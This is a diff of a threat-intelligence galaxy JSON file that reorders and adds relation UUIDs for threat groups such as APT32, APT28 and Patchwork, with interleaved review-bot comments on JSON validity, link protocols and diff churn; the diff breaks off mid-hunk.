@@ -4140,21 +4847,14 @@ "type": "uses" }, { - "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", + "dest-uuid": "327f3cc5-eea1-42d4-a6cd-ed34b7ce8f61", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "dest-uuid": "68f7e3a1-f09f-4164-9a62-16b648a0dd5a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -4174,13 +4874,6 @@ ], "type": "uses" }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "c16e5409-ee53-4d79-afdc-4099dc9292df", "tags": [ 
@@ -4188,76 +4881,6 @@ ], "type": "uses" }, - { - "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "98e8a977-3416-43aa-87fa-33e287e9c14c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "327f3cc5-eea1-42d4-a6cd-ed34b7ce8f61", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f6ae7a52-f3b6-4525-9daf-640c083f006e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "68f7e3a1-f09f-4164-9a62-16b648a0dd5a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", "tags": [ 
@@ -4266,14 +4889,77 @@ "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", + "dest-uuid": "98e8a977-3416-43aa-87fa-33e287e9c14c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c23b740b-a42b-47a1-aec2-9d48ddd547ff", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f25aab1a-0cef-4910-a85d-bb38b32ea41a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62dfd1ca-52d5-483c-a84b-d6e80bf94b7b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f2d44246-91f1-478a-b6c8-1227e0ca109d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -4286,6 +4972,13 @@ ], "type": "uses" }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "9ca488bd-9587-48ef-b923-1743523e63b2", "tags": [ @@ -4294,28 +4987,21 @@ "type": "uses" }, { - "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", + "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "dest-uuid": "f6ae7a52-f3b6-4525-9daf-640c083f006e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -4329,7 +5015,294 @@ "type": "uses" }, { - "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", + "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30489451-5886-4c46-90c9-0dff9adc5252", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2c4d4e92-0ccf-4a97-b54c-86d662988a53", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a127c32c-cbb0-4f9d-be07-881a792408ec", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a257ed11-ff3b-4216-8c9d-3938ef57064c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "294e2560-bd48-44b2-9da2-833b5588ad11", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b00f90b6-c75c-4bfd-b813-ca9e6c9ebf29", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "5a63f900-5e7e-4928-a746-dd4558e1df71", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "dc27c2ec-c5f9-4228-ba57-d67b590bda93", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "65917ae0-b854-4139-83fe-bf2441cf0196", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -4340,25 +5313,32 @@
 "value": "APT32 - G0050"
 },
 {
- "description": "[APT28](https://attack.mitre.org/groups/G0007) is a threat group that has been attributed to Russia's Main Intelligence Directorate of the Russian General Staff by a July 2018 U.S. Department of Justice indictment. This group reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election. (Citation: DOJ GRU Indictment Jul 2018) (Citation: Ars Technica GRU indictment Jul 2018) (Citation: Crowdstrike DNC June 2016) (Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: FireEye APT28 January 2017) (Citation: GRIZZLY STEPPE JAR) (Citation: Sofacy DealersChoice) (Citation: Palo Alto Sofacy 06-2018)",
+ "description": "[APT28](https://attack.mitre.org/groups/G0007) is a threat group that has been attributed to Russia's Main Intelligence Directorate of the Russian General Staff by a July 2018 U.S. Department of Justice indictment. This group reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election. 
[APT28](https://attack.mitre.org/groups/G0007) has been active since at least January 2007.(Citation: DOJ GRU Indictment Jul 2018) (Citation: Ars Technica GRU indictment Jul 2018) (Citation: Crowdstrike DNC June 2016) (Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: FireEye APT28 January 2017) (Citation: GRIZZLY STEPPE JAR) (Citation: Sofacy DealersChoice) (Citation: Palo Alto Sofacy 06-2018) (Citation: Symantec APT28 Oct 2018)",
 "meta": {
 "external_id": "G0007",
 "refs": [
 "https://attack.mitre.org/groups/G0007",
- "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf",
- "https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf",
- "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/",
+ "https://www.justice.gov/file/1080281/download",
+ "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/",
 "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/",
+ "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf",
 "https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign",
- "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf",
+ "https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf",
 "https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf",
 "https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/",
 "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/",
- "https://www.justice.gov/file/1080281/download",
- "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/"
+ "https://www.symantec.com/blogs/election-security/apt28-espionage-military-government",
+ "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/",
+ "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf",
+ "https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html",
+ "https://securelist.com/a-slice-of-2017-sofacy-activity/83930/",
+ "https://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50"
 ],
 "synonyms": [
 "APT28",
+ "SNAKEMACKEREL",
+ "Swallowtail",
+ "Group 74",
 "Sednit",
 "Sofacy",
 "Pawn Storm",
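Review bot: The new description at the top of this hunk reads `January 2007.(Citation: DOJ GRU Indictment Jul 2018)` with no space before the citation, and the break between `presidential election.` and `[APT28](...) has been active` appears here as a line break inside the JSON string. If that is a raw newline in the committed file the cluster is not valid JSON (control characters inside strings must be escaped as `\n`); if it is an escaped `\n`, it is inconsistent with the APT32 hunk in the same patch, which replaced that construct with a space, so the bytes are worth checking with `python -m json.tool` before merging. Separately, `http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf` is re-added as a plain-http reference while the other welivesecurity links in these hunks use https; for a feed whose references others fetch, the TLS form is preferable wherever the host serves it.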
@@ -4392,91 +5372,21 @@ "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "dest-uuid": "af2ad3b7-ab6a-4807-91fd-51bcaff9acbb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1b7ba276-eedc-4951-a762-0ceea2c030ec", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "dc27c2ec-c5f9-4228-ba57-d67b590bda93", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7343e208-7cab-45f2-a47b-41ba5e2f0fab", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "2dd34b01-6110-4aac-835d-b5e7b936b0be", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "96fd6cc4-a693-4118-83ec-619e5352d07d", - "tags": 
[ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "02fefddc-fb1b-423f-a76b-7552dd211d4d", + "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -4490,42 +5400,14 @@ "type": "uses" }, { - "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643", + "dest-uuid": "e669bb87-f773-4c7b-bfcc-a9ffebfdd8d4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "fe926152-f431-4baf-956c-4ad3cb0bf23b", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
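Review bot: Nearly all of this hunk, and of the hunks that follow it through `@@ -4819,7 +5729,105 @@`, is ordering churn rather than a content change: every `dest-uuid` removed in that range (e6919abc…, 0259baeb…, bb5a00de…, 1b7ba276…, and so on) is re-added elsewhere in the same `related` list, and as far as I can trace the net change for that entry is four new relations (0f20e3cb…, d20b397a…, be2dcee9…, dc31fe1e…). The same pattern repeats in `@@ -4955` through `@@ -5191` for the entry with uuid 6713ab67… (net change: one added relation, 42e8de7b…), in the ff6caf67…/c2ffd229… moves at `@@ -5289` to `@@ -5331`, and in the G0040/Patchwork entry from `@@ -5356` on, where the `refs` list is shuffled as well. Because every relation carries the identical tag `estimative-language:likelihood-probability="almost-certain"`, the generator could emit `related` sorted by `dest-uuid` (and `refs` in a stable order), so that a regeneration produces a diff showing only real additions and removals; as it stands, an accidentally dropped relation would be invisible among several hundred lines of reshuffled entries. If the reorder is intentional for this commit, a sentence in the commit message saying so would save reviewers from re-deriving the net change by hand.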
@@ -4539,21 +5421,28 @@ "type": "uses" }, { - "dest-uuid": "59a97b15-8189-4d51-9404-e1ce8ea4a069", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "0a68f1f1-da74-4d28-8d9a-696c082706cc", + "dest-uuid": "a1dd2dbd-1550-44bf-abcc-1a4c52e97719", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "dest-uuid": "edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "dc27c2ec-c5f9-4228-ba57-d67b590bda93", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -4566,6 +5455,111 @@ ], "type": "uses" }, + { + "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8ae43c46-57ef-47d5-a77a-eebb35628db2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9b52fca7-1a36-4da0-b62d-da5bd83b4d69", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d28ef391-8ed4-45dc-bc4a-2f43abf54416", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03259939-0b57-482f-8eb5-87c0e0d54334", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f460983-1bbb-4e7e-8094-f0b5e720f658", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + 
"type": "uses" + }, + { + "dest-uuid": "fb575479-14ef-41e9-bfab-0b7cf10bec73", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3257eb21-f9a7-4430-8de1-d8b6e288f529", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "02fefddc-fb1b-423f-a76b-7552dd211d4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", "tags": [ @@ -4573,6 +5567,48 @@ ], "type": "uses" }, + { + "dest-uuid": "fe926152-f431-4baf-956c-4ad3cb0bf23b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1b7ba276-eedc-4951-a762-0ceea2c030ec", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2dd34b01-6110-4aac-835d-b5e7b936b0be", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "c23b740b-a42b-47a1-aec2-9d48ddd547ff", "tags": [ 
@@ -4588,112 +5624,7 @@ "type": "uses" }, { - "dest-uuid": "edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8ae43c46-57ef-47d5-a77a-eebb35628db2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "af2ad3b7-ab6a-4807-91fd-51bcaff9acbb", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "a1dd2dbd-1550-44bf-abcc-1a4c52e97719", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c8655260-9f4b-44e3-85e1-6538a5f6e4f4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9b52fca7-1a36-4da0-b62d-da5bd83b4d69", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "64196062-5210-42c3-9a02-563a0d1797ef", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": 
